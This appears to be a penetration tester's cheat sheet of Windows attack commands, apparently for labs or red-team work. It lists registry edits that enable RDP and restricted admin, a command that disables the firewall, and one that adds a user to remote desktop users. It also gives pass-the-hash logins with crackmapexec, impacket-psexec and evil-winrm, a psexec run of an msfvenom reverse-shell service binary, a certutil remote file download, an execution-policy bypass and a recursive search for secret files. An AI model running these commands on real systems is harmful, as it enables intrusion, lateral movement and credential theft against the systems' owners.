Collection of Useful Commands - Windows

Enable RDP and Add user

reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f
reg add HKLM\System\CurrentControlSet\Control\Lsa /t REG_DWORD /v DisableRestrictedAdmin /d 0x0 /f
netsh advfirewall set allprofiles state off
net localgroup "remote desktop users" <username> /add

Crackmapexec

crackmapexec smb <ip/ip-range> -u <username> -H <ntlm> [-p <password>] -d <domain> --continue-on-success [--local-auth] [--lsa]

PowerView.ps1

See harmj0y's PowerView repository on GitHub

import-module .\PowerView.ps1
Get-DomainUser -SPN
Get-DomainComputer
Get-ForestTrust -Forest "<domain>"

impacket

impacket-psexec <domain>/<username>@<ip> -hashes ':<hash>'
impacket-psexec '<domain/client>/<username>'@<ip> -hashes ':<hash>'

# some_revshell.svc.exe is generated with msfvenom -f exe-service
impacket-psexec <domain>/<username>@<ip> -hashes ':<hash>' -remote-binary-name <some_revshell.svc.exe>

certutil

certutil -urlcache -split -f <url> <C:\file>

evil-winrm

evil-winrm -i <ip> -u <username> -H <ntlm>

powershell

# bypass the execution policy
powershell -ep bypass 

# Search recursively for files whose name matches a pattern
Get-ChildItem -Path C:\ -Include *network-secret* -Recurse -ErrorAction SilentlyContinue